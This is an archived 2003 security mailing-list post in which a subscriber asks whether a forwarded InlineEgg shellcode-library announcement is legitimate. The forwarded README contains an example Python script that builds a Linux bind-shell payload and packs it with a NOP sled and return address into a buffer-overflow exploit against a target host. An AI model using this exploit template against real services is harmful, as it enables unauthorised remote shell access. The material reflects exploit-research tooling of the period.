[Dshield] soliciting virus code

Guy Barnum GuyBarnum at Armscole.com
Mon Sep 8 15:24:43 GMT 2003

Has anyone else recieved this email?  I don't know if this is for real or not but if it is I'm surprised they have the nerve to send mass emails promoting their 'code for exploits'.

If this is real can they be prosecuted or at least shut down?

Guy Barnum

-----Original Message-----
From: Gerardo Richarte [mailto:gera at corest.com]
Sent: Thursday, September 04, 2003 6:36 PM
To: gera at corest.com
Subject: InlineEgg library release

We'd like to share with you the release of InlineEgg 1.0. the following 
is a reduced version of the
README available at 
the same page points to the .tar.gz

Welcome to InlineEgg.

Short version:

    InlineEgg is a collection of python classes (a "library"), that will 
you write small assembly programs, either to use as eggs/shellcode for your
exploits or for anything else you may need small assembly programs for. But!
without writing assembly, just using python.

    InlineEgg is now included in CORE IMPACT as another component of its egg
creation framework, but it started as a pretty simple idea to fulfill a 
simple need. We hope that you find it helpful for your own creations, so we
are releasing it under an opensource license for non commercial uses.

Long version:

A simple need: When writing exploits for remote code execution 
    (yes, that's what we do part of the time), you usually need to have 
a small
    assembly program that will be sent to the vulnerable application as 
part of
    the exploiting process. Historically, this small pieces of assembly code
    (eggs) were hardcoded as dead strings in the middle of the exploit. But,
    although having the strings handy gave the exploit writer some 
    and some flexibility, we sometimes needed more, we even needed the
    possiblity of creating our small assembly programs in runtime, and make
    them addapt to the situation... well, there are lots of different 
    to the problem, but as I already had some ideas on how to do it, I 
    into python.

A simple idea: Do something that lets us create small assembly programs by
    concatenating system calls, giving us the possibility of changing the
    arguments to the system calls, and adding more code when needed...


--- example2.py -----------------------------------------

from inlineegg import *
import socket
import struct
import sys

def listenShellEgg(listen_addr, listen_port):

#   egg = InlineEgg(FreeBSDx86Syscall)
#   egg = InlineEgg(OpenBSDx86Syscall)
   egg = InlineEgg(Linuxx86Syscall)

   # bind to port and listen
   sock = egg.socket(socket.AF_INET,socket.SOCK_STREAM)
   sock = egg.save(sock)                      # save the socket in a 
variable (in stack)
   egg.bind(sock, (listen_addr, listen_port)) # sock is now the 
variable, and it's used from the stack

   client = egg.accept(sock, 0, 0)
   client = egg.save(client)

   egg.dup2(client, 0)
   egg.dup2(client, 1)
   egg.dup2(client, 2)

   print "Egg len: %d" % len(egg)
   return egg

def main():
   if len(sys.argv) < 3:
      raise Exception, "Usage: %s <target ip> <target port>"

   # connect to target
   sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   sock.connect((sys.argv[1], int(sys.argv[2])))

   # create egg
   egg = listenShellEgg('',3334)

   # exploit

   retAddr = struct.pack('<L',0xbffffc24L)
   toSend  = "\x90"*(1024-len(egg))
   toSend += egg.getCode()
   toSend += retAddr*20





    I hope you find it useful and enjoy it,

-----Original Message-----
From: list-bounces at dshield.org [mailto:list-bounces at dshield.org]On
Behalf Of list-request at dshield.org
Sent: Thursday, September 04, 2003 5:23 PM
To: list at dshield.org
Subject: list Digest, Vol 9, Issue 6

Send list mailing list submissions to
	list at dshield.org

To subscribe or unsubscribe via the World Wide Web, visit
or, via email, send a message with subject or body 'help' to
	list-request at dshield.org

You can reach the person managing the list at
	list-owner at dshield.org

When replying, please edit your Subject line so it is more specific
than "Re: Contents of list digest..."

More information about the list mailing list